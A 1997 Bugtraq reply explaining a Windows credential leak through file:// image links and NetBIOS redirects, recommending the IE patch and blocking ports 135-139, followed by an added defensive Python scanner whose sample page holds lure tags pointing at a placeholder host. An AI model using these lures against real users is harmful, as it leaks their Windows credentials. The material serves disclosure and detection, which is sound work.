Bugtraq mailing list archives

Re: Latest IE FIX from MS is a HOAX


From: mhw () WITTSEND COM (Michael H. Warfield)
Date: Tue, 25 Mar 1997 23:10:23 -0500


Aaron Spangler enscribed thusly:

The Latest Internet Explorer Security Patch from Microsoft is a HOAX.

        'Fraid not...  You just don't understand the problem COMPLETELY.

I just installed the latest Internet Explorer Released by Microsoft Today
(IE 3.02 - Mar25).  It seems it is still COMPLETELY vulnerable to Bugs
#4,#5 released earlier in the month even though it claims to fix them!!!

        No.  There are two problems which can look like each other.  As it
is, bugs #4 & #5 can utilize Samba on UNIX/Linux and are NOT dependent on the
bugs in IE, it's a different horse with the same colors.  There IS a bug in
IE, just NOT this one.

Is Microsoft lying when they say it fixes the latest bugs?

        Microsoft lies about a LOT of things.  This is not one of them.  There
are TWO problems and BOTH must be fixed.  Only one of them is IE.  The other
is Netbios on TCP/IP and Windows {NT/95}.

Try it out yourself.  Download IE 3.02 from MS, and
try it on one of the sites

 #4 http://www.ee.washington.edu/computing/iebug/  (For NT only)
 #5 http://www.efsl.com/security/ntie/             (For NT only)

        These two web sites each take advantage of THE OTHER PROBLEM!  I've
used them BOTH in some tests and know exactly how they operate.  They are
utilizing Netbios on TCP/IP over port 139 to exploit Windows redirects.

I have not even checked bug #6 for win95, but it still may be vulnerable.
 #6  http://www.security.org.il/msnetbreak/  (bug#6 for Win95)

        I THINK this is the same as #4 and #5 just a subtle variation.  I
have not tested this last site like the others, but will...

        Here is da scoop:

        There are two problems!

        1)  Internet Explorer, when talking to a COMPATIBLE (i.e. IIS)
server, is capable of performing an SMB challenge response over http.  In
other words, when Netscape would prompt you for "User Name" and "Password",
IE would blithely use your Windows NT / Windows 95 user name and password
whether that's what you wanted or not.  This operates over port 80 (http).
Simple test...  If you browse a hostile page, if you are prompted for user
name and password, this is the IE bug and you are safe.  This bug can NOT
use a SAMBA server.  It works purely over HTTP and requires an HTTP server
which understands the SMB challenge response.  Apache and NCSA are just NOT
going to cut it here.  I have YET to see anyone successfully exploit this
one.  That's NOT to say it can't be or hasn't been done.  It's just a lot
tougher and I haven't seen one YET.

        2)  Netbios exploit...  This is the bug exploited by the Samba
based servers.  If you feed a page with an image link to
"file://ip-address/filename", then Windows NT (and with a LITTLE work
Windows 95) will attempt an SMB Netbios connection to that IP address over
port 139.  That server will then challenge your client to provide a user name
and password.  Windows NT will provide this moderately encrypted (brute force
attack works REAL well) but Windows 95 will cough up the user name and
password in CLEAR TEXT!  This operates over TCP port 139 (netbios session)
with an assist from UDP port 137 (netbios name service) for Windows 95.
Solution: TOTALLY BLOCK all netbios ports!  (UDP and TCP ports 135-139)
This is a Windows problem which even Netscape will trip over!  If you
browse this page and you get BUSTED IMAGES, it is the SECOND problem and
you are safe.

        If you do not get prompted for a user name and password AND you
get nice clean images - you're screwed.  You failed ONE OR THE OTHER
of the vulnerabilities (only takes ONE of the TWO).

        The FIRST problem is Internet Explorer and Internet Explorer alone.
I am unaware of ANY pages currently on the Internet which exploit this
vulnerability in the absence of the second vulnerability.  The second
vulnerability has virtually identical symptoms but IS NOT restricted to
IE.  Even Netscape can be bit by this one.  This one convinces Windows
to establish a netbios redirect to the hostile server.  The browser is
unaware of what is happening and THINKS it is just asking for a LOCAL file.

        You CAN NOT fix this problem unless you get the fix for IE AND
block all of the Netbios ports!  BOTH MUST BE DONE OR NEITHER WILL DO YOU
ANY GOOD!  Get the update to IE and NOT block Netbios ports and you will
THINK the IE fix didn't do any good!  Block the ports and use the buggy
IE and you get the SAME IDEA!  YA GOTTA FIX'EM BOTH!

        My NT expert didn't believe this until we did a double blind test
using our filtering firewall.  Now even he believes.  (Cost him a lunch
too...:->  Wish I had put some money on it to boot!)

 - Aaron

--
Aaron Spangler                 EE Unix System Administrator
Electrical Engineering FT-10        pokee () ee washington edu
University of Washington            Phone    (206) 543-8984
Box 352500                             or    (206) 543-2523
Seattle, WA 98195-2500              Fax      (206) 543-3842

        Mike
--
 Michael H. Warfield    |  (770) 985-6132   |  mhw () WittsEnd com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!
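The second problem described above hinges on a page carrying an auto-fetched resource (an image, frame, or body background) whose URL names a remote host with file:// or a UNC path, which Windows then resolves as a NetBIOS redirect over port 139. Blocking ports 135-139 at the firewall is the fix the post prescribes; the scanner below is a complementary check a gateway or proxy operator could run over fetched HTML to flag such lures. It is an added example, not code from Michael Warfield's or Aaron Spangler's posts; the function and class names are my own, and the sample page (using the documentation address 192.0.2.10) is constructed for illustration.

```python
"""Flag embedded resources that would make Windows contact a remote SMB/NetBIOS host."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Attributes whose value the browser (or Windows underneath it) fetches
# without any user action: the "image link to file://ip-address/filename"
# lure described in the post, plus the other auto-loading attributes.
AUTO_FETCH_ATTRS = {
    "img": ("src", "lowsrc"),
    "frame": ("src",),
    "iframe": ("src",),
    "script": ("src",),
    "embed": ("src",),
    "link": ("href",),
    "body": ("background",),
    "input": ("src",),
}


def remote_smb_host(url):
    """Return the remote host a URL would make Windows reach over NetBIOS, else None.

    file:///C:/x names a local file and is harmless here; both
    file://192.0.2.10/share/x.gif and \\\\192.0.2.10\\share\\x.gif name a server.
    """
    u = url.strip()
    if u.startswith("\\\\"):                       # UNC path: \\server\share\file
        server = u[2:].split("\\", 1)[0]
        return server or None
    if u.lower().startswith("file:"):
        host = urlsplit(u).netloc                    # empty for file:///C:/...
        if host and host.lower() not in ("localhost", "127.0.0.1"):
            return host.split(":")[0]
    return None


class RemoteFileLinkScanner(HTMLParser):
    """Collect (tag, attribute, url, host) for every auto-fetched remote file:// or UNC link."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        wanted = AUTO_FETCH_ATTRS.get(tag.lower())
        if not wanted:
            return
        for name, value in attrs:
            if value and name.lower() in wanted:
                host = remote_smb_host(value)
                if host:
                    self.findings.append((tag.lower(), name.lower(), value, host))


def scan_html(html):
    """Parse a page and return the list of suspicious auto-fetched links."""
    parser = RemoteFileLinkScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: one local file:// image (harmless), one HTTP image
# (harmless), and three references that would trigger a NetBIOS redirect.
SAMPLE_PAGE = r"""<html><body background="file://192.0.2.10/share/bg.gif">
<img src="http://www.example.com/logo.gif">
<img src="file:///C:/winnt/clock.avi">
<img src="file://192.0.2.10/share/pixel.gif" width=1 height=1>
<img src="\\192.0.2.10\share\pixel2.gif">
<iframe src="file://localhost/local.html"></iframe>
</body></html>"""

if __name__ == "__main__":
    for tag, attr, url, host in scan_html(SAMPLE_PAGE):
        print(f"<{tag} {attr}> -> {host}  ({url})")
```

On the sample page the scanner reports three findings, all pointing at 192.0.2.10; the local file:///C: reference, the file://localhost frame and the plain HTTP image are left alone. A page that trips this check is exactly the case where the post's "busted images" symptom should appear once NetBIOS ports are blocked.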
